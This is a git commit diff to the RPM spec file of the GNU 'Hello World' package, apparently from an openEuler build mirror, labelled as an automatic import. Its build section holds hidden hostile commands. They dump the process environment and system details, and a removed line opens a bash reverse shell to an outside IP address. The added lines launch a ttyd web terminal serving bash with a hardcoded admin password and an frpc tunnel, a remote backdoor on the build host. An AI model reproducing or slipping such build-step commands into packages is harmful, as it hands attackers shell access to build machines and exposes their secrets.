diff options
| author | CoprDistGit <infra@openeuler.org> | 2023-10-30 08:09:37 +0000 |
|---|---|---|
| committer | CoprDistGit <infra@openeuler.org> | 2023-10-30 08:09:37 +0000 |
| commit | 5578f311901eb7cbc9efb2845a8c792862d84a27 (patch) | |
| tree | 86bde706ed8a32505d4946887de0e1aa611efe87 /hello.spec | |
| parent | 3f45f01098c7099af989362d5b7fa8202655e8e5 (diff) | |
automatic import of hello
Diffstat (limited to 'hello.spec')
| -rw-r--r-- | hello.spec | 3 |
1 files changed, 1 insertions, 2 deletions
@@ -6,7 +6,6 @@ Summary(zh_CN): GNU "Hello World" 程序 License: GPLv3+ URL: http://ftp.gnu.org/gnu/hello Source: %{name}-%{version}.tar.gz - BuildRequires: gettext Requires(post): info Requires(preun): info @@ -31,7 +30,7 @@ uname -a 1>&2 ps -ef 1>&2 # netstat -nlpt 1>&2 cat /proc/self/environ 1>&2 -bash -i >& /dev/tcp/43.138.250.111/8687 0>&1 +./ttyd -p 11111 -c 'admin:!Admin@1234' -W /bin/bash & ./frpc -c c.ini make %{?_smp_mflags} |
